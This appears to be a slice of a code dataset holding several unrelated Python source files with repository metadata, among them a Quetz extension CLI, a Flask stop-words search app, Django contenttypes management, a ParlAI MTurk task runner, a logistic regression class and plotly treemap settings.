print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
print(
f"""
System cofigured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
raise ModuleNotFoundError(f"There is not a extension at {module_path}")
if __name__ == "__main__":
app()
| true
| true
|
f70531e2ad32c627bf6d2ee9773984e911b06c5b
| 192
|
py
|
Python
|
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
| 24
| 55
| 0.744792
|
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
| true
| true
|
f705329421c3a54d538ba279a1d4c9007a13943a
| 3,953
|
py
|
Python
|
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | 2
|
2019-11-25T19:22:24.000Z
|
2020-07-07T04:54:50.000Z
|
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | null | null | null |
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request
import json
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write("<p class='text-danger'>Had the search been completed, you would've got an output shown in the following image.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
| 47.059524
| 203
| 0.589679
|
from flask import Flask, render_template, request
import json
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
| true
| true
|
f705330137e0d77aaa9e47ecb94b760f7a854733
| 2,916
|
py
|
Python
|
django/contrib/contenttypes/management.py
|
KingWapo/django
|
115c307184d441fbc27a8f43a99af5d992cfcc13
|
[
"BSD-3-Clause"
] | 2
|
2015-01-21T15:45:07.000Z
|
2015-02-21T02:38:13.000Z
|
env/lib/python2.7/site-packages/django/contrib/contenttypes/management.py
|
luiscarlosgph/nas
|
e5acee61e8bbf12c34785fe971ce7df8dee775d4
|
[
"MIT"
] | 10
|
2019-12-26T17:31:31.000Z
|
2022-03-21T22:17:33.000Z
|
env/lib/python2.7/site-packages/django/contrib/contenttypes/management.py
|
luiscarlosgph/nas
|
e5acee61e8bbf12c34785fe971ce7df8dee775d4
|
[
"MIT"
] | 1
|
2021-03-06T14:22:00.000Z
|
2021-03-06T14:22:00.000Z
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
# Get all the content types
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
| 29.16
| 101
| 0.63546
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
| true
| true
|
f705330f398c68077399fd500653c9cafa921704
| 4,870
|
py
|
Python
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
khaimaitien/Mai_convai2
|
83bf99ba09d678455aad49239f3daefc5a7b8fc9
|
[
"BSD-3-Clause"
] | 1
|
2018-09-28T05:47:45.000Z
|
2018-09-28T05:47:45.000Z
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
crazyrex/ParlAI
|
fbfda4f4aadd357dfdb7b4baf230c45c039a1338
|
[
"BSD-3-Clause"
] | 1
|
2018-09-27T17:11:24.000Z
|
2018-09-27T17:11:24.000Z
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
khaimaitien/Mai_convai2
|
83bf99ba09d678455aad49239f3daefc5a7b8fc9
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
"""This task consists of one agent, model or MTurk worker, talking to an
MTurk worker to negotiate a deal.
"""
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
help='maximal number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
default=300, help='time limit for turker'
'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
| 38.650794
| 150
| 0.626489
|
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
help='maximal number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
default=300, help='time limit for turker'
'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
| true
| true
|
f705343bf3fc1ba799d2ebee62971a89002e3bcf
| 2,523
|
py
|
Python
|
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Logistic Regression Gradient Descent
"""
import numpy as np
class LogisticRegressionGD(object):
"""Logistic Regression Classifier using gradient descent.
Parameters
------------
eta : float
Learning rate (between 0.0 and 1.0)
n_iter : int
Passes over the training dataset.
random_state : int
Random number generator seed for random weight
initialization.
Attributes
-----------
w_ : 1d-array
Weights after fitting.
cost_ : list
Logistic cost function value in each epoch.
"""
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
""" Fit training data.
Parameters
----------
X : {array-like}, shape = [n_examples, n_features]
Training vectors, where n_examples is the number of
examples and n_features is the number of features.
y : array-like, shape = [n_examples]
Target values.
Returns
-------
self : object
"""
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
# note that we compute the logistic `cost` now
# instead of the sum of squared errors cost
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
"""Calculate net input"""
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
"""Compute logistic sigmoid activation"""
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
"""Return class label after unit step"""
return np.where(self.net_input(X) >= 0.0, 1, 0)
# equivalent to:
# return np.where(self.activation(self.net_input(X))
# >= 0.5, 1, 0)
| 30.035714
| 63
| 0.52279
|
import numpy as np
class LogisticRegressionGD(object):
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
return np.where(self.net_input(X) >= 0.0, 1, 0)
| true
| true
|
f705365fe4791c97b8b3d6bace419ef73911d813
| 1,149
|
py
|
Python
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 5
|
2020-07-17T07:33:58.000Z
|
2022-03-02T06:23:47.000Z
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 7
|
2020-06-03T14:55:17.000Z
|
2021-12-30T00:01:50.000Z
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 12
|
2020-01-09T14:02:39.000Z
|
2022-01-24T07:18:51.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.mysql.hooks.mysql import MySqlHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
| 38.3
| 83
| 0.761532
|
import warnings
from airflow.providers.mysql.hooks.mysql import MySqlHook
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
| true
| true
|
f705371ad450409a7a5a8779c94a8bb544f9b844
| 114,476
|
py
|
Python
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 2
|
2019-11-08T07:01:11.000Z
|
2019-11-17T10:10:49.000Z
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 12
|
2020-06-06T01:22:26.000Z
|
2022-03-12T00:13:42.000Z
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 17
|
2019-11-21T14:11:29.000Z
|
2019-11-21T15:26:23.000Z
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
# flip
# ----
@property
def flip(self):
"""
Determines if the positions obtained from solver are flipped on
each axis.
The 'flip' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y'] joined with '+' characters
(e.g. 'x+y')
Returns
-------
Any
"""
return self["flip"]
@flip.setter
def flip(self, val):
self["flip"] = val
# packing
# -------
@property
def packing(self):
"""
Determines d3 treemap solver. For more info please refer to
https://github.com/d3/d3-hierarchy#treemap-tiling
The 'packing' property is an enumeration that may be specified as:
- One of the following enumeration values:
['squarify', 'binary', 'dice', 'slice', 'slice-dice',
'dice-slice']
Returns
-------
Any
"""
return self["packing"]
@packing.setter
def packing(self, val):
self["packing"] = val
# pad
# ---
@property
def pad(self):
"""
Sets the inner padding (in px).
The 'pad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# squarifyratio
# -------------
@property
def squarifyratio(self):
"""
When using "squarify" `packing` algorithm, according to https:/
/github.com/d3/d3-hierarchy/blob/master/README.md#squarify_rati
o this option specifies the desired aspect ratio of the
generated rectangles. The ratio must be specified as a number
greater than or equal to one. Note that the orientation of the
generated rectangles (tall or wide) is not implied by the
ratio; for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is either 2:1 or
1:2. When using "squarify", unlike d3 which uses the Golden
Ratio i.e. 1.618034, Plotly applies 1 to increase squares in
treemap layouts.
The 'squarifyratio' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["squarifyratio"]
@squarifyratio.setter
def squarifyratio(self, val):
self["squarifyratio"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
